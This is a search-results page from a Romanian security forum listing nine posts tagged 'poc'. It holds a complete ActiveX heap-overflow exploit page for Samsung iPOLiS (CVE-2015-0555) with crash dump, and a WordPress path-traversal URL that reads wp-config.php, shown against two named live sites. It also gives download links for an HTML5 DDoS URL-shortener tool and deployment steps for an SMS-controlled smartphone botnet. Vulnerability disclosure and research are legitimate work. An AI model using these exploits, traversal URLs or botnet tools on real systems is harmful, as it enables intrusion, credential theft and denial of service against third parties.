Jump to content

Search the Community

Showing results for tags 'poc'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 9 results

  1. During a recent engagement, I discovered a machine that is running VMware ESXi 6.7.0. Upon inspecting any known vulnerabilities associated with this version of the software, I identified it may be vulnerable to ESXi OpenSLP heap-overflow (CVE-2021–21974). Through googling, I found a blog post by Lucas Leong (@_wmliang_) of Trend Micro’s Zero Day Initiative, who is the security researcher that found this bug. Lucas wrote a brief overview on how to exploit the vulnerability but share no reference to a PoC. Since I couldn’t find any existing PoC on the internet, I thought it would be neat to develop an exploit based on Lucas’ approach. Before proceeding, I highly encourage fellow readers to review Lucas’ blog to get an overview of the bug and exploitation strategy from the founder’s perspective.
  2. [XSS] Apple.com Status Raported PoC:
  3. Vuln.: [Cross site scripting] *.Telekom.de Status: Raported PoC:
  4. sleed

    AT&T

    Vuln.: [XSS] [Cross Site Scripting]: *.att.com Demo ^ Poc : Status: Raportat
  5. <!-- # Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555) # Date: 22/02/2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx # Version: Samsung iPOLiS 1.12.2 # Tested on: Windows 7 Ultimate N SP1 # CVE: 2015-0555 --> <html> <!-- Vulnerability found and PoC coded by Praveen Darshanam http://blog.disects.com CVE-2015-0555 targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx" prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long" memberName = "WriteConfigValue" progid = "XNSSDKDEVICELib.XnsSdkDevice" Operating System = Windows 7 Ultimate N SP1 Vulnerable Software = Samsung iPOLiS 1.12.2 CERT tried to coordinate but there wasn't any response from Samsung --> <head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var arg1 = ""; var arg2="praveend"; for (i=0; i<= 15000; i++) { arg1 += "A"; } target.WriteConfigValue(arg1 ,arg2); </script> </html> <!-- #############Stack Trace#################### Exception Code: ACCESS_VIOLATION Disasm: 149434 MOV AL,[ESI+EDX] Seh Chain: -------------------------------------------------- 1 647C7D7D mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] --> Source
  6. E gasit de ceva vreme ,nu mai am video cu PoC, dar merge. PoC : Reward : Hall Of Thanks : https://secure.sony.net/hallofthanks , Numele meu real este Ionescu George, ma gasiti pe linia a 2 a. Si bineinteles tricoul (Cred ca l-am mai postat)
  7. POC: http://localhost/?sd_action=demo&file=wp-config.php DEMO: hXXP://satoriwheels.org/?sd_action=demo&file=wp-config.php hXXP://skyhighrank.com/?sd_action=demo&file=wp-config.php Sursa
  8. Malicious URL Shortener + HTML5 DDoS PoC This project demonstrates the serious consequences of the Internet's increased reliance upon URL shortners, as well as how easy it is to create an unwitting DDoS botnet using new HTML5 features without actually exploiting a single computer. It is intended only for demonstration and testing purposes; if you target a site that is not yours, you are responsible for the consequences. Download: http://d0z-me.googlecode.com/files/d0z-me-0.2.tar.gz
  9. To avoid detection, this proof-of-concept code utilizes the Short Messaging Service (SMS) as a command & control channel. This adds fault tolerance because, if a smartphone is not available on the GSM network due to being powered off or out of service range, when an SMS message arrives for delivery, the message is queued and delivered by the network. Download the POC code from Here. Compiling instructions are simple and straight forward. Please follow these: Compile with arm-gcc with the -static flag set Copy to anywhere on the underlying OS that is writable (/data/ is good). Rename /dev/smd0/ to /dev/smd0real/ Start the bot application Kill the radio application (ps | grep rild) The radio will automatically respawn and now the bot proxy will be working The PoC code for smartphone botnet C&C over SMS was presented at the Shmooconheld in January 2011. It seems that the author also has it working for the iPhone platform! For sanity purposes, the PoC code has payloads aka commands removed. So what you see in the demo video will need to be added manually. It however does include logging and a local open port for testing to make developing your own payloads easier! Demo video here Sursa: SomeKnowledge.tk
×
×
  • Create New...